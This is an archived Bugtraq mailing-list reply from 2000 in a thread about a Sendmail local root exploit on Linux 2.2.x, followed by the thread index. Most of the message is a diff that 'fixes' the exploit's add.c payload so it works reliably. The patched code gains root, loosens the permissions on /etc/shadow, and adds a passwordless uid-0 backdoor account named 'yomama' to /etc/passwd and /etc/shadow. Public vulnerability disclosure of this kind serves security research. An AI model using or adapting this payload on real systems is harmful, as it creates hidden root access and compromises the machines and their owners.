Bugtraq mailing list archives
Re: Sendmail local root exploit on linux 2.2.x
From: pettit () YAHOO-INC COM (Mark K. Pettit)
Date: Thu, 8 Jun 2000 12:18:44 -0700
Hello all, Attached is a file with 2 sources, ex.c and add.c
This is a great exploit. It is a little broken, though. Here's a patched version of the add.c script so that it is a little kinder and works out of the box the first time. The problem has to do with the permissions on the shadow file. If it's installed with mode 400, the exploit will fail. There's also a \n left out of the shadow line. This patch fixes both of these problems. Yah, I know it's trivial, but I wanted to be complete. ============================================================================ --- add.c.orig Thu Jun 8 11:32:33 2000 +++ add.c Thu Jun 8 11:21:15 2000 @@ -1,17 +1,24 @@ #include <fcntl.h> +#include <sys/types.h> +#include <sys/stat.h> +#include <unistd.h> int main (void) { int fd; char string[40]; + struct stat buf; seteuid(0); fd = open("/etc/passwd", O_APPEND|O_WRONLY); strcpy(string, "yomama:x:0:0::/root:/bin/sh\n"); write(fd, string, strlen(string)); close(fd); + stat("/etc/shadow", &buf); + chmod("/etc/shadow", S_IRUSR|S_IWUSR); fd = open("/etc/shadow", O_APPEND|O_WRONLY); - strcpy(string, "yomama::11029:0:99999:7:::"); + strcpy(string, "yomama::11029:0:99999:7:::\n"); write(fd, string, strlen(string)); close(fd); - + chmod("/etc/shadow", buf.st_mode); } ============================================================================ -- Mark K. Pettit, CCNA Do you, uh, Yahoo!? pettit () yahoo-inc com Why, yes, I do, uh, Yahoo! Technical Yahoo Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051
Current thread:
- Sendmail local root exploit on linux 2.2.x Florian Heinz (Jun 08)
- Snort 1.6 and nmap 2.54beta1 Galileo (May 12)
- Re: Snort 1.6 and nmap 2.54beta1 Simple Nomad (Jun 14)
- Security Advisory: REMOTE ROOT VULNERABILITY IN GSSFTP DAEMON Tom Yu (Jun 14)
- Security Advisory: local ROOT exploit in BRU Technical Support (Jun 14)
- Re: Snort 1.6 and nmap 2.54beta1 Martin Roesch (Jun 14)
- Re: Sendmail local root exploit on linux 2.2.x Mark K. Pettit (Jun 08)
- Reporting Security Issues to Microsoft Microsoft Security Response Center (Jun 08)
- Re: Sendmail local root exploit on linux 2.2.x Christophe GRENIER (Jun 08)
- arprelay: a tool to edit TCP connections in a LAN Felix von Leitner (Jun 09)
- Re: Sendmail local root exploit on linux 2.2.x Alan Iwi (Jun 12)
- Splitvt exploit syzop (Jun 14)
- Re: Splitvt exploit Joey Hess (Jun 14)
- Re: Splitvt exploit Andrey Savochkin (Jun 16)
- Re: Splitvt exploit Joey Hess (Jun 16)
- NAI WebShield SMTP does not scan base64 encoding chris.paget () ANALYSYS COM (Jun 20)
- Re: Splitvt exploit Joey Hess (Jun 14)
- Re: Splitvt exploit Kris Kennaway (Jun 15)